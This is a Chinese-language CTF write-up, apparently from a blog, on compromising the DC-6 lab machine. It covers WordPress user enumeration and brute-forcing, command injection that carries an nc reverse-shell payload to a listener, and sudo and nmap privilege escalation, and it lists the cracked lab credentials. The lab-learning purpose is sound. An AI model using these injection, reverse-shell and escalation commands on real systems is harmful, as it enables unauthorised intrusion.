码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • DC-6 靶机


    DC_6

    信息搜集

    存活检测

    在这里插入图片描述

    详细扫描

    image-20231023165338741

    需要添加 DNS 解析

    vim /etc/hosts
    
    • 1

    image-20231023165450298

    后台网页扫描

    dirsearch -u http://10.4.7.150
    
    • 1

    image-20231023165740307

    网页信息搜集

    • 使用 wappalyzer 插件识别 cms 指纹,发现为熟悉的 WordPress

      image-20231023172017074

    • 并且发现了网站的登陆页面

      image-20231023172452558

    • 直接上 wpscan

      扫描用户

      wpscan --url http://wordy --enumerate u 
      
      • 1

      扫描出如下用户,将用户写入 users 文件中以供爆破

      image-20231023174329291

    • 尝试 cewl 生成密码字典

      image-20231023174804359

    • 爆破

      image-20231023175229931

    • 爆破失败

      image-20231023175257084

    • rockyou 字典爆破

      image-20231023212103641

      dc6 官网上提示过滤一些密码可以提升爆破速度

      cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
      
      • 1
      wpscan --url http://wordy --passwords passwords.txt --usernames users
      
      • 1

      image-20231023212303251

    • 成功爆破

      用户名 mark

      密码 helpdesk01

      image-20231023213537470

    • 登录网页

      image-20231023213733116

    Webshell

    • 搜索框内尝试命令注入

      image-20231023214759279

    • kali 开启 nc 监听

      image-20231023214840083

    • 输入连接反弹 shell 的命令

      10.1.1.1|nc -e /bin/bash 10.4.7.146 7777
      
      • 1

      有长度限制

      image-20231023215002694

    • 修改源码中允许的最大长度

      输入反弹命令,点击 Lookup 连接

      image-20231023215429620

    • 成功反弹

      image-20231023215447981

    ssh登录

    • 反弹成功后搜集系统中有用信息

      在 /hoomr/mark/stuff 下发现了包含 graham 密码的文件

      密码为 GSo7isUM1D4

      image-20231023220034640

      尝试 ssh 登录

    • 成功登录

      image-20231023220149331

    提权

    • sudo -l 查看权限

      image-20231023220219626

    • 发现 jens 可以无需密码以 root 权限运行 /home/jens/backups.sh

    • 查看 backup.sh 文件

      image-20231023220904917

      发现是一个压缩命令

    • 查看文件权限

      image-20231023220931296

      所属组拥有全部权限

    • 查看 graham 信息

      image-20231023221450772

      发现与 jens 同属一个组,拥有对文件的修改权限

    • 向文件中写入提权命令

      echo bash >> backups.sh
      
      • 1

      image-20231023221548032

    • sudo 执行

      sudo -u jens /home/jens/backups.sh
      
      • 1

      image-20231023222159317

    • 切换到 jens 用户

      image-20231023222240231

    • sudo -l 查看 root 权限

      image-20231023222319457

    • nmap 提权

      TF=$(mktemp)
      echo 'os.execute("/bin/sh")' > $TF
      sudo nmap --script=$TF
      
      • 1
      • 2
      • 3

      image-20231023223242815

    • 提权成功

      image-20231023223314391

    总结

    • 命令注入,绕过
    • wpscan 用户扫描,密码爆破
    • nmap 提权
  • 相关阅读:
    最小化安装debian11
    【问题解决】我遇到并解决PlatformIO无法使用的各种问题汇总及解决方法,简单粗暴使用的网络问题解决方法...
    简明 JDBC 数据访问操作库:JdbcHelper(二)
    【音频处理】Fast Convolution 快速卷积算法简介
    曼哈顿距离与曼哈顿矩形-打印回字型矩阵
    3.Layui3个基本元素
    [iOS]-消息传递和消息转发机制
    使用eBPF加速阿里云服务网格ASM
    【VMware vCenter】VMware vCenter Server(VCSA) 5.5 版本证书过期问题处理过程。
    QT之QTableView的简介
  • 原文地址:https://blog.csdn.net/weixin_51559599/article/details/134000840
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号